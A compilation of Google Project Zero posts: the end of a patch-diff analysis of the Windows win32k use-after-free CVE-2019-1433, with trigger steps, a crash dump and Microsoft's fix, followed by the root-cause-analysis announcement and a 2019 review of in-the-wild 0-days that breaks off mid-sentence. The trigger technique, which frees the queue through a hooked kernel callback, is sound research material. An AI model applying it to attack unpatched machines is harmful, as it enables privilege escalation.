This call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.

xxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it's not expected that user applications will respond to this message.
Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>).

In the callback, we free the tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput "attaches the input processing mechanism of one thread to that of another thread" and to do this, it destroys the queue of the thread that is being attached to another thread's input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:

 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we'll loop back to the top of the while loop.
 2. Once we're back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn't work because this window is a special system class (fnid == 0x2A0).
Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.

```c
if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 &&
    gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&
    gspwndAltTab->bDestroyed == 0 )
    v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);
else
    v45 = 0i64;
```

### USING THE FREED QUEUE

Once v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.

## WINDOWS 10

CVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.

Vulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)

Patched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)

I confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.

```text
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.

FAULTING_IP:
win32kfull!xxxNextWindow+743
ffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h]

 # Child-SP          RetAddr           Call Site
00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus
01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12
02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952
03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107
04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933
05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f
06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360
07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 <- UAF
08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005
09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b
0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5
0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5
0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab
0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4
0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3
0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d
10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25
11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14
12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 <- My POC
13 0000002b`2a5ffc10 00007ffb`7f86ced1 KERNEL32!BaseThreadInitThunk+0x14
14 0000002b`2a5ffc40 00000000`00000000 ntdll!RtlUserThreadStart+0x21

BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
```

To trigger the crash, I only had to change two things in
the Windows 7 POC:

 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch window). It is possible to do this programmatically, I just didn't take the time to code it up.
 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.

It took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run).

[Figure: side-by-side disassembly. Left: Disassembly at xxxNextWindow+737 in Oct 2019 Update. Right: Disassembly at xxxNextWindow+73F in Nov 2019 Update]

The fix in the November update for Windows 10 1903 is the same as the Windows 7 fix:

 * Add the UnlockQueue function.
 * Add locking around the call to xxxNextWindow.
 * Check the "destroyed" bitflag in the tagQ struct before proceeding to use the queue.

# FIXING THE VULNERABILITY

To patch the CVE-2019-1433 vulnerability, Microsoft changed four functions:

 * xxxNextWindow
 * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)
 * zzzDestroyQueue
 * UnlockQueue (new function)

Overall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects.

## zzzDestroyQueue Patch

The only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags.
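To make the three-part fix summarized above concrete (deferred destroy bit in zzzDestroyQueue, lock/unlock around the xxxNextWindow call, destroyed-bit check before the queue is used again), here is a small C model added for this write-up; it is not Microsoft's win32k code, and the tagQ layout, the helper names and the NW_* result values are assumptions. The release of the object is modelled with a flag rather than a real free so the pre-patch path can be exercised safely.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Bit index tested by the patched xxxNextWindow ("bt dword ptr [rbp+13Ch], 1Ah"). */
#define QF_DESTROYED_BIT 0x1Au

/* Model of the queue object; layout and field names are assumptions, not win32k's. */
typedef struct tagQ {
    uint32_t cLockCount;  /* lock count: while > 0 the object must not be released */
    uint32_t QF_flags;    /* flag word; zzzDestroyQueue sets the destroyed bit here */
    int      spwndActive; /* stand-in for the pointer read at LABEL_106 */
    bool     freed;       /* model only: true once the object has been released */
} tagQ;

typedef enum { NW_OK = 0, NW_BAILED = 1, NW_UAF = 2 } nw_result;

/* A user-mode callback reached from xxxNextWindow; it may destroy the queue. */
typedef void (*um_callback)(tagQ *q);

/* Pre-patch destroy: nothing consults a lock, so the object is released at once. */
static void zzzDestroyQueue_prepatch(tagQ *q) { q->freed = true; }

/* Post-patch destroy: a locked queue is only marked; the release is deferred. */
static void zzzDestroyQueue_patched(tagQ *q) {
    if (q->cLockCount > 0) {
        q->QF_flags |= 1u << QF_DESTROYED_BIT;
        return;
    }
    q->freed = true;
}

/* New UnlockQueue: drop one lock; on the last unlock finish a deferred destroy. */
static void UnlockQueue(tagQ *q) {
    if (q->cLockCount == 0) return;              /* tolerate an unbalanced unlock */
    if (--q->cLockCount == 0 && (q->QF_flags & (1u << QF_DESTROYED_BIT)))
        q->freed = true;
}

/* Pre-patch xxxNextWindow: uses the queue after the callback without any check. */
static nw_result xxxNextWindow_prepatch(tagQ *q, um_callback cb) {
    cb(q);                        /* user mode runs here and may destroy q */
    if (q->freed) return NW_UAF;  /* the real code would now read freed memory */
    (void)q->spwndActive;
    return NW_OK;
}

/* Post-patch xxxNextWindow: tests the destroyed bit before touching the queue. */
static nw_result xxxNextWindow_patched(tagQ *q, um_callback cb) {
    cb(q);
    if (q->freed) return NW_UAF;  /* only possible if the caller did not lock */
    if (q->QF_flags & (1u << QF_DESTROYED_BIT)) return NW_BAILED;
    (void)q->spwndActive;
    return NW_OK;
}

/* Pre-patch xxxKeyEvent: hands the queue down with no lock held. */
static nw_result xxxKeyEvent_prepatch(tagQ *q, um_callback cb) {
    return xxxNextWindow_prepatch(q, cb);
}

/* Post-patch xxxKeyEvent: lock the queue around the call, then UnlockQueue. */
static nw_result xxxKeyEvent_patched(tagQ *q, um_callback cb) {
    ++q->cLockCount;
    nw_result r = xxxNextWindow_patched(q, cb);
    UnlockQueue(q);
    return r;
}

/* Callbacks standing in for the AttachThreadInput path that destroys the queue. */
static void destroying_callback_prepatch(tagQ *q) { zzzDestroyQueue_prepatch(q); }
static void destroying_callback_patched(tagQ *q)  { zzzDestroyQueue_patched(q); }
static void benign_callback(tagQ *q) { (void)q; }

int main(void) {
    tagQ before = {0, 0, 1, false};
    printf("pre-patch result: %d (2 = use-after-free)\n",
           (int)xxxKeyEvent_prepatch(&before, destroying_callback_prepatch));

    tagQ after = {0, 0, 1, false};
    nw_result r = xxxKeyEvent_patched(&after, destroying_callback_patched);
    printf("patched result: %d (1 = bailed), released after unlock: %d\n",
           (int)r, (int)after.freed);
    return 0;
}
```

Note that the destroyed-bit check alone would not be enough: without the lock taken in xxxKeyEvent, zzzDestroyQueue would still release the object during the callback and the bit would be read from freed memory.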
[Figure: zzzDestroyQueue Pre-Patch (BinDiff)]

[Figure: zzzDestroyQueue Post-Patch (BinDiff)]

## xxxNextWindow Patch

There is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added at xxxNextWindow+0x847 are as follows, where rbp is the pointer to the tagQ structure.

```asm
bt dword ptr [rbp+13Ch], 1Ah
jb loc_FFFFF9600017A0C9
```

If the bit is set, the function exits. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above.

[Figure: xxxNextWindow changes (BinDiff graph)]

## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch

In this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10.

The change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn't appear to be publicly documented by Microsoft.
My understanding comes from Tarjei Mandt's 2011 Blackhat USA presentation, "[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)". Thread locking is where objects are added to a thread's lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread.

The new function, UnlockQueue, is used to unlock the queue.

```c
if ( !queue )
    queue = gptiRit->pq;
xxxNextWindow(queue, vkey_cp);
```

xxxKeyEvent+92E Pre-Patch

```c
if ( !queue )
    queue = gptiRit->pq;
++queue->cLockCount;
currWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);
threadLockW32 = currWin32Thread->ptlW32;
currWin32Thread->ptlW32 = (_TL *)&threadLockW32;
queueCp = queue;
unlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;
xxxNextWindow(queue, vkey_cp);
currWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);
currWin32Thread2->ptlW32 = threadLockW32;
unlockQueueFnPtr(queueCp);
```

xxxKeyEvent+94E Post-Patch

# CONCLUSION

So...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).

If I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn't have analyzed the wrong bug.
This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn't get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.

Although this blog post didn't turn out how I originally planned, I decided to share it in the hopes that it'd encourage others to explore a platform new to them. It's often not a straight path, but if you're interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!

I didn't initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit.
Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.

---

Source: "TFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln", Google Project Zero, published 2020-04-02, <https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html>

---

# Posted by Maddie Stone, Project Zero

When a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day.

Our effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we're publishing some in bulk now to play "catch-up", in the future we plan to post each one in a timely manner after it's detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions.

We've added a new column to the ["0day In the Wild" tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) that will link to any RCAs that we publish.
We will also continue to update the following page on our blog as we publish additional RCAs.

[0-Day Exploit Root Cause Analyses](<https://googleprojectzero.blogspot.com/p/rca.html>)

For each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we'd love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our [template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) and publish this information about 0-days they detect and/or analyze!

When completing a root cause analysis we focus on the following areas.

 * Bug class
 * Details of the vulnerability, such as how to trigger, what it allows, etc.
 * Exploit method and whether or not it's a known method
 * Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)
 * Any historical, present, and future bug context such as previous related bugs
 * Areas for variant analysis and any found variants
 * Structural improvements
   * Can you also kill the entire bug class?
   * Is there a way to make it much harder to exploit?
 * Potential detection methods for similar 0-days
   * Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from "indicators of compromise" because we're focusing on detecting while it's still a 0-day.

We selected these areas because the vulnerability details and exploit method provide in-depth explanation of facts of the exploit: what is the vulnerability, how does it work, and how was it exploited.
Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or not work well in practice, some will be (and already have been) reasonable and able to be launched. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lockdown, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.

Out of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we're publishing here today. These are 5 out of the 6 of the 0-days detected in August or later of 2019 (when I joined the team and started this initiative). In addition, we're publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with [Google's Threat Analysis Group](<https://blog.google/threat-analysis-group>), and a Firefox 0-day that Project Zero had reported to Firefox, that was also discovered independently in-the-wild.

 * [CVE-2019-7286](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7286.html>): iOS use-after-free in CFPrefsDaemon
 * [CVE-2019-7287](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-7287.html>): iOS buffer overflow in ProvInfoIOKitUserClient
 * [CVE-2019-1107](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-11707.html>): Firefox type confusion in Array.pop
 * [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>): JScript use-after-free in Internet Explorer
 * [CVE-2019-2215](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-2215.html>): Android use-after-free in Binder
 * [CVE-2019-13720](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-13720.html>): Chrome
use-after-free in webaudio
 * CVE-2019-1429: JScript use-after-free in Internet Explorer (See [CVE-2019-1367](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>))
 * [CVE-2019-1458](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html>): Windows win32k uninitialized variable in task switching

These RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers.

Our hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming and more difficult for attackers to use 0-days in the wild. Please [reach out](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0&range=A18>) with any feedback and/or suggestions and we hope that others will also begin publishing information from the [RCA template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) in the future.

---

Source: "Root Cause Analyses for 0-day In-the-Wild Exploits", Google Project Zero, published 2020-07-29, <https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>

---

Next post (CVEs referenced: CVE-2016-5195, CVE-2018-8653, CVE-2019-0676, CVE-2019-0703, CVE-2019-0797, CVE-2019-0803, CVE-2019-0808, CVE-2019-0859, CVE-2019-0880, CVE-2019-1132, CVE-2019-1367, CVE-2019-13720, CVE-2019-1429, CVE-2019-1458, CVE-2019-2215, CVE-2019-5786, CVE-2019-7286, CVE-2019-7287, CVE-2020-0674):

Posted by Maddie Stone, Project Zero

In May 2019, Project Zero released our [tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) for 0-days used "in the wild" and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we've seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing [8 root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we have done for in-the-wild 0-days from 2019.

When I had the idea for this "Year in Review" blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there'd be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or... but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days.
Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\n\nThe rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.\n\n# The Basics\n\nIn 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping [here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>). This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. \n\n[figure](<https://1.bp.blogspot.com/-KjU24qokuEA/Xx7hJ08C_1I/AAAAAAAAQsM/OKDRS46ehfI1hNudHNV4_lNoUHxTubtfgCNcBGAsYHQ/s1600/image2.png>)\n\nThe largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don\u2019t know the true detection rate of all 0-day exploits, it\u2019s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. 
For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we\u2019d clearly know that to be false.\n\nAll of the 0-day exploits detected in 2019 are detailed in the Project Zero [tracking spreadsheet here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=8521108>). \n\n## 0-days by Vendor\n\nOne of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. \n\nWhile Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it\u2019s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft\u2019s ecosystem also allows for 3rd parties, in addition to Microsoft itself, to deploy detection solutions for 0-days. The more people looking for 0-days using varied detection methodologies suggests more 0-days will be found.\n\n[figure](<https://1.bp.blogspot.com/-GZX-X9f4DIA/Xx7hqTX713I/AAAAAAAAQsY/rFiPVHd9cloMQtfR4bPTL9SGRyCNV2N5gCNcBGAsYHQ/s1600/image1.png>)\n\n# Microsoft Deep-Dive\n\nFor 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. 
Therefore, I think it\u2019s worthwhile to dive into the Microsoft bugs to see what we can learn since it\u2019s the only platform we have a decent sample size for. \n\nOf the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows. All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it\u2019s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. \n\nOut of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.\n\nEven just within the Microsoft 0-days, there is likely detection bias. 
Is legacy software really the predominant target for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?\n\nCVE | Windows 7 SP1 | Windows 8.1 | Windows 10 | Win 10 1607 | Win 10 1703 | Win 10 1803 | Win 10 1809 | Win 10 1903 | Exploitation of Latest SW Release? | Component \n---|---|---|---|---|---|---|---|---|---|--- \nCVE-2019-0676 | X | X | X | X | X | X | X | | Yes (1809) | IE \nCVE-2019-0808 | X | | | | | | | | N/A (1809) | win32k \nCVE-2019-0797 | | X | X | X | X | X | X | | Exploitation Unlikely (1809) | win32k \nCVE-2019-0703 | X | X | X | X | X | X | X | | Yes (1809) | Windows SMB \nCVE-2019-0803 | X | X | X | X | X | X | X | | Exp More Likely (1809) | win32k \nCVE-2019-0859 | X | X | X | X | X | X | X | | Exp More Likely (1809) | win32k \nCVE-2019-0880 | X | X | X | X | X | X | X | X | Exp More Likely (1903) | splwow64 \nCVE-2019-1132 | X | | | | | | | | N/A (1903) | win32k \nCVE-2019-1367 | X | X | X | X | X | X | X | X | Yes (1903) | IE \nCVE-2019-1429 | X | | X | X | X | X | X | X | Yes (1903) | IE \nCVE-2019-1458 | X | X | X | X | | | | | N/A (1909) | win32k \n \n## Internet Explorer JScript 0-days 
CVE-2019-1367 and CVE-2019-1429\n\nWhile this blog post\u2019s goal is not to detail each 0-day used in 2019, it\u2019d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor [according to Google\u2019s Threat Analysis Group (TAG)](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>). \n\nOur [root cause analysis](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>) provides more details on these bugs, but we\u2019ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was \u201cfixed\u201d as CVE-2019-1367, but it turns out the patch didn\u2019t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric ([P0 1947](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>)). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft\u2019s patch was again incomplete. This issue was patched as CVE-2020-0674. \n\nA more thorough discussion on variant analysis and complete patches is due, but at this time we\u2019ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. 
If we as an industry want to make 0-day harder, we can\u2019t give attackers four chances at the same bug. \n\n# Memory Corruption\n\n63% of 2019\u2019s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-frees being a common target is nothing new. \u201c[Smashing the Stack for Fun and Profit](<http://phrack.org/issues/49/14.html>)\u201d, the seminal work describing stack-based memory corruption, was published back in 1996. But it\u2019s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there\u2019s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don\u2019t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and that they tend to be less reliable than logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don\u2019t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. 
Logic and design bugs on the other hand rarely look the same because in their nature they\u2019re taking advantage of a specific flaw in the design of that specific component, thus making it more difficult to detect than standard memory corruption vulns.\n\nEven if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.\n\n# More Thoughts on Detection\n\nAs we\u2019ve discussed up to this point, the same questions posed in the team's [original blog post](<https://googleprojectzero.blogspot.com/p/0day.html>) still hold true: \u201cWhat is the detection rate of 0-day exploits?\u201d and \u201cHow many 0-day exploits are used without being detected?\u201d. \n\nWe, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days as well as third party security companies. We don\u2019t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there\u2019s less likelihood of detecting 0-days on those platforms too. 
An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection.\n\n## Who is doing the detecting? \n\nAnother interesting side of detection is that a single security researcher, Cl\u00e9ment Lecigne of Google's TAG, is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third less of the 0-days actually used in the wild if it wasn\u2019t for Cl\u00e9ment and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that\u2019s a worrying sign for how we\u2019re using our resources. The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-days exploits that are used in the wild. \n\nOut of the 20 0-days, only one (CVE-2019-0703) 